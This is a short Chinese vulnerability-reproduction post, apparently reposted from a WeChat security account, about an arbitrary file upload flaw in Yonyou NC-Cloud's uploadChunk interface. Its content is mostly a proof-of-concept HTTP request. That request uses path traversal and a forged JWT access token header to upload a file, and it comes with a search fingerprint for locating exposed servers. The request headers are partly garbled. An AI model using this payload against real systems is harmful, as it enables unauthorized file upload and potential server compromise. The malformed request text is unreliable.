-
0x01 阅读须知
-
0x02 产品介绍
-
0x03 漏洞描述
-
0x04 漏洞影响
未知
-
0x05 复现环境
app="用友-NC-Cloud"
-
0x06 漏洞复现
POC如下:
/../../../nccloud/&chunk=1&chunks=1 HTTP/1.1 =
Host:
Mozilla/4.0 (Mozilla/4.0; MSIE 7.0; Windows NT 5.1; FDM; SV1; .NET CLR 3.0.04506.30) :
gzip, deflate :
Accept: */*
Connection: close
accessTokenNcc: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyaWQiOiIxIn0.F5qVK-ZZEgu3WjlzIANk2JXwF49K5cBruYMnIOxItOQ
148 :
multipart/form-data; boundary=de7a6692c03f903d173515933ee6f161 :
--de7a6692c03f903d173515933ee6f161
form-data; name="file"; filename="test.txt" :
test
--de7a6692c03f903d173515933ee6f161--
poc中存在一个请求头:accessTokenNcc,该请求头为JWT,详情请点击原文查看。
返回操作成功即证明上传成功,访问test.txt确认。
上传成功,至此漏洞复现结束。
原文始发于微信公众号(花果山讲安全):【漏洞复现】用友NC-Cloud系统uploadChunk存在任意文件上传漏洞
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论